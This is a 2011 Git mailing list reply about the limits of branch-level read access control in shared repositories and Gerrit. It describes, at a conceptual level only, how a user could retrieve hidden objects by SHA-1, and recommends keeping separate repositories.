On Tue, May 17, 2011 at 7:36 PM, Shawn Pearce <spearce@xxxxxxxxxxx> wrote: > On Tue, May 17, 2011 at 05:08, Sitaram Chamarty <sitaramc@xxxxxxxxx> wrote: > Yes. Or, he has a SHA-1 he suspects is a tree or blob and lists that > in a tree he pushes to a branch he can write to. Now he can fetch that > branch back, and obtain that object whose SHA-1 he has but whose > contents he does not have. Good point. Not too hard too I guess, unlike this one: > There is another attack that is incredibly improbable, but that JGit [snipped lots of complicated stuff] > assume this theoretical attack is too improbable to succeed. (And it > is given what we know about SHA-1 today.) IMO most of the theoretical attacks are just that. They advance the state of the art but I've not heard of any of them actually being used in a real life scenario. The sad fact is there are much weaker links to be found if you look around and you don't need all this. >> Having two repos is still the best plan ;-) > > Yes, but tell that to Gerrit Code Review users. They really use the > branch ACL features. :-) Interesting. I do a fair amount of git consulting and training (inhouse) and this has only come up once so far. I haven't seen it as being that common at all. -- To unsubscribe from this list: send the line "unsubscribe git" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html